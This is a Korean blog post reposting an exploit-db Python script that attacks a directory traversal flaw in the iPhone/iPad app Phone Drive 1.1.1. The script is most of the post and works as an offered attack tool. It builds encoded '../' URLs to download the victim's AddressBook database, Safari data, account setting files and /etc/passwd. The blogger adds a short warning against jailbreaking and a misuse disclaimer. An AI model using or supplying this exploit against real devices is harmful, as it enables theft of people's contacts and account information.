Jailbroken 된 아이폰/아이패드에서 Directory Traversal 취약점 공개.
아래 코드를 보시면 아시겠지만 파이썬으로 개인 주소록을 갈취하는 코드 작성하여
공개되었네요.
역시 Jailbroken은 왠만하면 하지 맙시다.
[출처] www.exploit-db.com/exploits/17645/
[notice: 악의적인 사용시 사용자 본인에게 책임이 있음을 공지합니다.]
아래 코드를 보시면 아시겠지만 파이썬으로 개인 주소록을 갈취하는 코드 작성하여
공개되었네요.
역시 Jailbroken은 왠만하면 하지 맙시다.
#!/usr/bin/python |
#---------------------------------------------------------------- |
#Software : iPhone/iPad Phone Drive 1.1.1 |
#Type of vulnerability : Directory Traversal |
#Tested On : iPhone 4 (IOS 4.3.3/Jailbroken) |
#---------------------------------------------------------------- |
#Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8 |
#---------------------------------------------------------------- |
#Discovered by : Khashayar Fereidani |
#Team Website : Http://IRCRASH.COM |
#English Forums : Http://IRCRASH.COM/forums/ |
#Team Members : Khashayar Fereidani , Arash Allebrahim |
#Email : irancrash [ a t ] gmail [ d o t ] com |
#Facebook : http://facebook.com/fereidani |
#Twitter : http://twitter.com/ircrash |
#---------------------------------------------------------------- |
import urllib2 |
def urlread(url, file ): |
url = url + "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f" + file |
u = urllib2.urlopen(url) |
localFile = open ( 'result.html' , 'w' ) |
localFile.write(u.read()) |
localFile.close() |
print "file saved as result.html\nIRCRASH.COM 2011" |
print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT -\n- Discovered by : Khashayar Fereidani -\n- http://ircrash.com/ -\n----------------------------------------" |
url = raw_input ( "Enter Address ( Ex. : http://192.168.1.101:8080 ):" ) |
f = [" "," / private / var / mobile / Library / AddressBook / AddressBook.sqlitedb "," / private / var / mobile / Library / Safari "," / private / var / mobile / Library / Preferences / com.apple.accountsettings.plist "," / private / var / mobile / Library / Preferences / com.apple.conference.plist "," / etc / passwd"] |
print f[ 1 ] |
id = int ( raw_input ( "1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:" )) |
if not ( 'http:' in url): |
url = 'http://' + url |
if (( id > 0 ) and ( id < 6 )): |
file = f[ id ] |
urlread(url, file ) |
if ( id = = 6 ): |
file = raw_input ( "Enter Local File Address : " ) |
urlread(url, file ) |
[출처] www.exploit-db.com/exploits/17645/
[notice: 악의적인 사용시 사용자 본인에게 책임이 있음을 공지합니다.]
'글로벌_Gossip > 2011' 카테고리의 다른 글
AnDOSid the DOS tool for Android (0) | 2011.08.31 |
---|---|
Orange.fr hacked, Database and site source code leaked (0) | 2011.08.29 |
AOL Postmaster Website hacked by HODLUM (0) | 2011.08.29 |
Apple 서브 도메인 해킹 (0) | 2011.08.29 |
[NASA] Dust Band Around the Nucleus of "Black Eye Galaxy" M64 (0) | 2011.08.08 |